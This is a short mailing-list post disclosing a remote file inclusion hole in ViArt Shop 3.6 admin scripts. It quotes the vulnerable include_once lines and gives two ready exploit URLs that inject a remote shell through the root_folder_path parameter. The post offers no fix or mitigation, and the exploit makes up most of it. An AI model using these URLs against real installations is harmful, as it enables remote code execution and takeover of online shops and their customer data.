[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RFI Bug



ViArt Shop 3.6   Remote File Include BUG



FreeDownload :  http://www.viart.com/tracking_downloads.php?fn=viart_shop-3.6.zip
 
 

#FOUND BY : Dr-Linux

#Mail : Dr.linux@xxxxxxx



    

include_once($root_folder_path."includes/common.php");
	
include_once($root_folder_path . "includes/record.php");



Exploi >>> http://www.target/path/admin/admin_forgotten_password.php?root_folder_path=[shell] 


    

include_once($root_folder_path . "messages/" . $language_code . "/download_messages.php");



Exploit >>> http://www.target/path/admin/admin_admin.php?root_folder_path=[shell]